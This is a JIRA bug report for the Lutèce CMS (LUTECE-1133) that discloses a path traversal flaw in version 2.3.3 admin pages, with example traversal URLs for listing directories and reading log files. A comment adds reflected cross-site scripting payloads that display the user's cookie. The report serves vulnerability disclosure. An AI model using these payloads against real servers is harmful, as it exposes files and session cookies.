Issue Details (XML | Word | Printable)

Key: LUTECE-1133
Type: Bug Bug
Status: Open Open
Priority: Major Major
Assignee: ILE
Reporter: Nicolas Gregoire
Votes: 0
Watchers: 1
Operations

If you were logged in you would be able to see more operations.
Lutèce

Contributors and admins can browse directories and read files outside of the webroot

Created: 03/Feb/10 11:42 AM   Updated: 08/Feb/10 09:32 AM
Component/s: core
Affects Version/s: 2.3.3
Fix Version/s: 2.4.0

Time Tracking:
Not Specified

Environment: The issue isn't specific to any OS or software platform


 Description  « Hide

Under Windows, access is limited to the virtual drive on which is installed Lutece.
Under Unix, access depends of the privileges of the Tomcat user.

Browsing directories :
/jsp/admin/system/ManageFilesSytemDir.jsp?dir=/../../../../logs/

Reading files :
/jsp/admin/system/ViewFile.jsp?directory=/../../../../../logs/&file=error.log
/jsp/admin/system/ViewFile.jsp?directory=/&file=../../../../../logs/error.log

Impact is large mainly when Lutece is deployed on some shared/hosted servers where Lutece contributors haven't sysadmins privileges.

Sort Order: Ascending order - Click to sort in descending order
[ Permalink | « Hide ]
Nicolas Gregoire added a comment - 03/Feb/10 02:43 PM

These pages can too be used to inject JavaScript code (aka Cross Site Scripting attack).
The following URL will display the content of the user's cookie :

/jsp/admin/system/ManageFilesSytemDir.jsp?dir=/../../../../%00%3Chr%3EXSS%3Chr%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E%3Chr%3E

/jsp/admin/system/ViewFile.jsp?directory=%3Chr%3EXSS%3Chr%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E%3Chr%3E
Atlassian JIRA (v4.0.1#471) | Report a problem | Request a feature | Contact administrators
Powered by a free Atlassian JIRA open source license for Lutece. Try JIRA - bug tracking software for your team.